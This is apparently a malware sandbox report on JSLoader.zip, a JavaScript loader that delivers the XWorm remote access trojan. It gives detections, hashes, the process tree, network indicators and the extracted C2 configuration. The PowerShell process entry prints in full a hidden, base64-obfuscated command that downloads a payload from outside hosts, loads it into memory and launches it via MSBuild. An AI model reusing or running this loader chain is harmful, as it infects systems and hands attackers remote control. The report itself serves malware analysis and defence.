File name:

JSLoader.zip

Full analysis: https://app.any.run/tasks/3cfe8a57-8c11-4ad3-9a61-9954f62a86b3
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: May 17, 2025, 15:43:54
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
remote
xworm
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
MD5:

BC2DCE36F833119595C7BAA6D2C87A58

SHA1:

30A56ACDD1599220AEEF0981A8CBEAF777F1BDE0

SHA256:

E7991E4A7EFDA5CE512DF7E28B602C798E581193A42040759E7FEF4EC43E2C20

SSDEEP:

96:BaDPGLs/3mTv0W7tede4ekKlM61WzQYricjDcHlQmYpRgSg/5V:QDOLsO9kwlV0EYr5oDYpIP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7152)

    • Generic archive extractor

      • WinRAR.exe (PID: 5376)

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7152)

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7152)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5892)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5892)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5892)

    • XWORM has been detected (YARA)

      • MSBuild.exe (PID: 660)

    • XWORM has been detected (SURICATA)

      • MSBuild.exe (PID: 660)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7152)

    • Executes script without checking the security policy

      • powershell.exe (PID: 5892)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 7152)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 7152)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7152)

    • Connects to unusual port

      • MSBuild.exe (PID: 660)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 7152)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5892)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 7152)

    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 660)

  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 7152)

    • Checks proxy server information

      • wscript.exe (PID: 7152)
      • powershell.exe (PID: 5892)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5892)

    • Reads the computer name

      • MSBuild.exe (PID: 660)

    • Checks supported languages

      • MSBuild.exe (PID: 660)

    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 660)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5892)

    • Disables trace logs

      • powershell.exe (PID: 5892)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5892)

    • Reads the software policy settings

      • slui.exe (PID: 536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(660) MSBuild.exe
C2backupclientes.ddns.net:7000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.2
Mutexw4cd4aBNsA6Erfi2
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0003
ZipCompression: Unknown (99)
ZipModifyDate: 2025:05:17 15:40:52
ZipCRC: 0xc8956013
ZipCompressedSize: 4040
ZipUncompressedSize: 360071
ZipFileName: 9f28f82d21fe99d0efdcab403f73870d68fd94e6d0f762e658d923ccd1e7424c.js
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
136
Monitored processes
9
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs sppextcomobj.exe no specs slui.exe wscript.exe powershell.exe conhost.exe no specs #XWORM msbuild.exe svchost.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
536"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
660"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
XWorm
(PID) Process(660) MSBuild.exe
C2backupclientes.ddns.net:7000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.2
Mutexw4cd4aBNsA6Erfi2
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4208C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5376"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\JSLoader.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
5552\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5892"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$sartainty = 'JAB0AHIAbwBsAGwAZQBkACAAPQAgACcAIwB4ACMALgBmADgAMABiADYANgAzADQAYgBjADAAOAAyAGIAYgBhADkAMwA4ADQAMAA1ADEAYwBlAGYAYgA2AGMAMAAzADAAXwBvAHYAaQB1AHEAcgBhAC8AbQBvAGMALgBuAGkAZwB1AGwAcABhAGEAdgBhAGoALwAvADoAcAAjACMAaAAnADsAJAByAGgAbwBkAHkAbQBlAG4AaQBhACAAPQAgACQAdAByAG8AbABsAGUAZAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAcABvAHIAdAByAGEAaQB0AHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADMAMAA0AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMgA5AC8AaQB0AGUAbQBzAC8AbgBlAHcAXwBpAG0AYQBnAGUAXwAyADAAMgA1ADAANQAxADYAXwAxADkAMQA1AC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwAnADsAJABNAGMARwB1AGYAZgBlAHkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATQBjAEcAdQBmAGYAZQB5AC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGIAZQBhAG4AYwByAGEAawBlACAAPQAgACQATQBjAEcAdQBmAGYAZQB5AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHAAbwByAHQAcgBhAGkAdABzACkAOwAkAG4AYQBuAG8AYwBoAGUAbQBpAHMAdABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgBlAGEAbgBjAHIAYQBrAGUAKQA7ACQAZQBpAGcAaAB0AHMAYwBvAHIAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAQgBvAGwAbAB5ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAGgAZQBsAGkAbwBwAGgAaQBsAG8AdQBzACAAPQAgACQAbgBhAG4AbwBjAGgAZQBtAGkAcwB0AHMALgBJAG4AZABlAHgATwBmACgAJABlAGkAZwBoAHQAcwBjAG8AcgBlACkAOwAkAGEAbgB0AGkAZgBlAHIAcgBvAG0AYQBnAG4AZQB0ACAAPQAgACQAbgBhAG4AbwBjAGgAZQBtAGkAcwB0AHMALgBJAG4AZABlAHgATwBmACgAJABCAG8AbABsAHkAKQA7ACQAaABlAGwAaQBvAHAAaABpAGwAbwB1AHMAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABhAG4AdABpAGYAZQByAHIAbwBtAGEAZwBuAGUAdAAgAC0AZwB0ACAAJABoAGUAbABpAG8AcABoAGkAbABvAHUAcwA7ACQAaABlAGwAaQBvAHAAaABpAGwAbwB1AHMAIAArAD0AIAAkAGUAaQBnAGgAdABzAGMAbwByAGUALgBMAGUAbgBnAHQAaAA7ACQAbABhAHYAaQBzAGgAZQByACAAPQAgACQAYQBuAHQAaQBmAGUAcgByAG8AbQBhAGcAbgBlAHQAIAAtACAAJABoAGUAbABpAG8AcABoAGkAbABvAHUAcwA7ACQAbQBlAGwAZQB6AGkAYgBpAG8AcwBlACAAPQAgACQAbgBhAG4AbwBjAGgAZQBtAGkAcwB0AHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaABlAGwAaQBvAHAAaABpAGwAbwB1AHMALAAgACQAbABhAHYAaQBzAGgAZQByACkAOwAkAGEAZABqAGUAYwB0AGkAdgBhAGwAaQB0AHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbQBlAGwAZQB6AGkAYgBpAG8AcwBlACkAOwAkAGEAbQBwAGgAaQBiAGkAbwB1AHMAbgBlAHMAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABhAGQAagBlAGMAdABpAHYAYQBsAGkAdAB5ACkAOwAkAHIAZQB0AHIAYQBuAHMAZgBlAHIAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGgAbwBkAHkAbQBlAG4AaQBhACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnADEAJwAsACcAaAB0AHQAcABzADoALwAvAGoAYQB2AGEAYQBwAGwAdQBnAGkAbgAuAGMAbwBtAC8AYgBrAHAAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBjAHkAdABvAG0AZQB0AHIAaQBjAGEAbABsAHkAJwAsACcAagBzACcALAAnADMAMAAnACwAJwAnACwAJwBrAGkAbgBvAG0AZQAnACwAJwAyACcALAAnACcAKQApAA==' -replace '','';$slipperier = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($sartainty));Invoke-Expression $slipperier;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6436C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7152"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\9f28f82d21fe99d0efdcab403f73870d68fd94e6d0f762e658d923ccd1e7424c.js" C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
8 965
Read events
8 945
Write events
20
Delete events
0

Modification events

(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\JSLoader.zip
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(5376) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(7152) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
8CF0100000000000
Executable files
0
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
5892powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rv5ppi2f.4mq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5892powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xjtphitg.ykp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5376WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb5376.45614\9f28f82d21fe99d0efdcab403f73870d68fd94e6d0f762e658d923ccd1e7424c.jstext
MD5:1C244BA5CF7EAE15117D0819B8018A43
SHA256:9F28F82D21FE99D0EFDCAB403F73870D68FD94E6D0F762E658D923CCD1E7424C
5892powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:DD2EDC50A8FAEB70CB6DBAB9320B0001
SHA256:76597DB7879875CD3E76AC7B0220B1A24D5F69643583B74202109849A83E052D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
26
DNS requests
17
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.20:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7152
wscript.exe
GET
301
82.29.188.81:80
http://javaaplugin.com/arquivo_c464ff979c334e3498cda1e191ff4ff4.txt
unknown
unknown
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5892
powershell.exe
GET
301
82.29.188.81:80
http://javaaplugin.com/arquivo_030c6bfec1504839abb280cb4366b08f.txt
unknown
unknown
4244
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4244
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.216.77.20:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.31.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
7152
wscript.exe
82.29.188.81:80
javaaplugin.com
Virgin Media Limited
GB
unknown
7152
wscript.exe
82.29.188.81:443
javaaplugin.com
Virgin Media Limited
GB
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.216.77.20
  • 23.216.77.18
  • 23.216.77.27
  • 23.216.77.26
  • 23.216.77.11
  • 23.216.77.17
  • 23.216.77.25
  • 23.216.77.19
  • 23.216.77.12
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
google.com
  • 172.217.16.206
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 40.126.31.3
  • 20.190.159.68
  • 20.190.159.4
  • 20.190.159.128
  • 40.126.31.69
  • 20.190.159.71
  • 40.126.31.67
  • 40.126.31.0
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
javaaplugin.com
  • 82.29.188.81
unknown
ia601304.us.archive.org
  • 207.241.227.174
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
660
MSBuild.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
JSLoader.zip